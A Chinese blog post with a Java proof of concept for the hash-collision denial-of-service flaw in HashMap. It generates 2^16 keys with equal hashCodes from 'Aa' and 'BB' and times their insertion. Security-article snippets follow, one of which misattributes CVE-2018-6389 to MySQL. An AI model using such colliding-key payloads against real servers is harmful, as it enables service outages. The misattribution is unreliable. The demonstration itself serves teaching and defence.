`
zhangyeny
  • 浏览: 31544 次
  • 性别: Icon_minigender_1
  • 来自: 厦门
社区版块
存档分类
最新评论

Hash表的拒绝服务漏洞

 
阅读更多
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/**
 * 用来模拟HashMap的拒绝服务攻击,因为hash表存放数据的时候如果HashCode值相等,
 * 首先用hash值确定tables的索引【index】,得到entry,然后将自己加入entry链的头部
 * 原来的值就成为它的next,这也是为什么entry有Next
 * 则这个相同的HashCode上用链表的形式去存放HashCode相等的值,如果相似的Code
 * 太多,这个链表将很长,一个简单的查询将耗尽所有的CPU
 * @author wb-zhangye
 *
 */
public class HashDenyService {
	/**
	 * 存放要放入hash表中hashcode相同的字符串
	 */
	private static List<String> DEPOSITORY = new ArrayList<String>();
	
	/**
	 * HashMap存放多个hashCode相同的键
	 */
	private static Map<String, String> DENYMAP = new HashMap<String, String>();
	
	/**
	 * 要放入hash表中的相同hashCode的个数,用 2 的POWER次幂表示,
	 * 例如 2^15
	 */
	private static int POWER = 15;
	
	
	public static void main(String[] args) {
		
		/**************************************************
		 ***************构造多个hashCode相同的Map***********
		 **************************************************/
		System.out.println("-------------attack---------- ");
		Long beginTime = System.currentTimeMillis();
		
		String xx = "Aa", yy = "BB";	// xx 与 yy的hashCode值相同
		String[] arrays = { xx, yy };
		perm(arrays, null);
		
		for(int i = 0; i < DEPOSITORY.size(); i++){
			DENYMAP.put(DEPOSITORY.get(i), "xx" + i);
		}
		
		Long endTime = System.currentTimeMillis();
		System.out.println("-------------cease fire---------- ");
		System.out.println("一共耗时" + (endTime - beginTime));
		
		
		/**************************************************
		 *************在Map中取出一个key对应的value*********
		 **************************************************/
		System.out.println("-------------start get Service---------- ");
		Long xstartTiem = System.currentTimeMillis();
		
		String tempData = DENYMAP.get(DEPOSITORY.get(30));
		int code = hash(tempData.hashCode());
		int index = code & (64 - 1);
		System.out.println("index is " + index);
		
		System.out.println(DENYMAP.get(DEPOSITORY.get(30)));
		Long xendTime = System.currentTimeMillis();
		System.out.println("一共耗时" + (xendTime - xstartTiem));
		System.out.println("-------------end end Service---------- ");
	}
	
	public static int hash(int h) {
        h ^= (h >>> 20) ^ (h >>> 12);
        return h ^ (h >>> 7) ^ (h >>> 4);
    }

	/**
	 * 构造多个hashcode相同的字符串,放入DEPOSITORY中
	 * @param arrays
	 * @param paramList
	 */
	public static void perm(String[] arrays, List<String> paramList) {
		int length = arrays.length;
		for (int i = 0; i < length; i++) {
			List<String> tempArray = null;
			if (null == paramList) {
				tempArray = new ArrayList<String>();
			} else {
				tempArray = paramList;
			}
			if (tempArray.size() <= POWER) {
				List<String> tempList = new ArrayList<String>(tempArray);
				tempList.add(arrays[i]);
				perm(arrays, tempList);
			} else {
				DEPOSITORY.add(transferStr(tempArray));
				return;
			}
		}
	}
	
	private static String transferStr(List list){
		int length = list.size();
		StringBuilder builder = new StringBuilder();
		for(int i = 0; i < length; i++){
			builder.append(list.get(i));
		}
		return builder.toString();
	}
}
	



Output


-------------attack----------
-------------cease fire----------
一共耗时99433
-------------start get Service----------
index is 27
xx30
一共耗时0
-------------end end Service----------
分享到:
评论

相关推荐

    关于Hash Collision DoS漏洞:web实例

    标题中的“Hash Collision DoS漏洞:web实例”指的是在Web应用程序中出现的一种安全问题,即哈希碰撞拒绝服务攻击(Hash Collision Denial of Service)。这种攻击利用了哈希表(Hash Table)数据结构的特性,当两个...

    PHP 5.2.17 Win32 Hash 补丁

    在这个情况下,攻击者可能会利用这个漏洞进行拒绝服务(DoS)攻击,或者在某些情况下,可能能够执行任意代码,从而获取对系统的控制权。 **补丁的类型与应用** PHP 5.2.17的补丁分为两类,分别对应不同的编译选项:...

    互联网系统在线安全监测技术研究方案(标书).pdf

    其次,网站可用性及平稳度监测主要针对拒绝服务攻击和域名劫持等问题,通过远程监测技术和网络响应速度分析,及时发现潜在的拒绝服务攻击,同时监控域名安全,确保DNS解析的正常运行。 接着,网站挂马监测是针对...

    信息系统安全考题.pdf

    (A) A、拒绝服务 B、文件共享 C、BIND漏洞 D、远程过程调用 2. (单选题)为了防御网络监听,最常用的方法是:(B) A、采用物理传输(非网络) B、信息加密 C、无线网 D、使用专线传输 3.(单选题)一个数据包过滤...

    互联网系统在线安全监测技术设计方案(标书).doc

    1.1.2.2 可用性及稳定性监测主要关注拒绝服务攻击和域名劫持,通过PING、HTTP响应速度等方法检测可能的拒绝服务攻击,同时监控DNS解析速度以确保域名安全。 1.1.2.3 挂马监测功能旨在发现被嵌入恶意代码的网页,...

    渗透测试及攻防演练PDF.pdf

    渗透测试能够获取的有效信息包括信息泄露、业务逻辑测试、认证测试、会话管理测试、数据有效性验证测试、拒绝服务测试、应用安全测试、入侵通路测试等。 攻防演练是指一系列的测试和评估,以确保计算机系统或网络的...

    大型软件申 报系统20161014.pdf

    `Client ReDoS From Regex Injection`, `Unchecked Input for Loop Condition`, `Use of a One Way Hash with a Predictable Salt`等,这些都是可能导致隐私泄露、拒绝服务攻击、不安全的数据处理等问题的漏洞。...

    ddos解决方案

    分布式拒绝服务攻击(DDoS)是一种常见的网络攻击方式,它利用大量被控制的设备同时向目标发送请求,从而导致目标服务器的资源被耗尽,无法为合法用户提供服务。DDoS攻击的防御和解决方案是网络安全性的重要组成部分...

    Kali Linux渗透测试(安全牛).txt

    │ 任务134:拒绝服务工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye.mp4 │ ├─第17章 免杀 │ 任务135:恶意软件、防软件、免杀技术、当前现状.mp4 ...

    网安-2016.docx

    23. **分布式拒绝服务攻击(DDoS)**:通过大量傀儡机发送合法但无用的数据包,消耗目标主机资源。预防措施包括:更新系统补丁、禁止IP欺骗、协同防御、建立多层次安全体系。 这些知识点涵盖了网络安全的基本原理、...

    CVE-2018-6389

    此漏洞主要影响MySQL 5.5、5.6和5.7版本,可能导致远程代码执行(RCE)或者拒绝服务(DoS)攻击,对企业的数据安全构成严重威胁。本文将深入探讨该漏洞的成因、影响范围以及如何进行防护。 ### 漏洞成因 CVE-2018-...

    php100 2012版 17集CodeIgniter框架教程(3)密码

    否则拒绝访问。 ### 密码重置机制 为了方便用户在忘记密码时能够找回账户,通常会设计密码重置功能。常见的做法是在用户请求重置密码时,向其注册邮箱发送一封包含重置链接的邮件。用户点击链接后,系统会引导其...

    2018上半年信息安全工程师考试案例分析真题.doc

    2. 攻击目标:WanaCry 勒索软件主要针对Windows系统,因为它利用了Windows操作系统中的SMB(Server Message Block)服务漏洞进行攻击。 3. 恶意代码特征:恶意代码通常具有以下共同特征: - 恶意目的:设计用于...

    信息安全试题B.doc.docx

    被动攻击,如监听和数据窃取,通常是难以检测的,而主动攻击,如拒绝服务攻击和中间人攻击,可以通过防火墙和入侵检测系统来预防。 2. 数据完整性机制可以防止数据在传输过程中被篡改或破坏,但无法防止源地址欺骗...

    iphone4shsh

    如果不匹配,Apple将拒绝该操作,以防止非法固件的安装。 以下是一些关于iPhone 4 SHSH的重要知识点: 1. **备份SHSH**:用户可以通过第三方工具如TinyUmbrella或Redsn0w备份他们的SHSH。这是为了在Apple停止签署...

    基于离散ID序列的RFID标签认证协议

    由于RFID系统中的标签与阅读器之间的通信主要依赖于无线信道,这为攻击者提供了多种非法攻击的机会,比如窃听、重放攻击、假冒、篡改数据以及拒绝服务攻击(DoS)。这些攻击不仅能够泄露标签信息,还可能对带有RFID...

Global site tag (gtag.js) - Google Analytics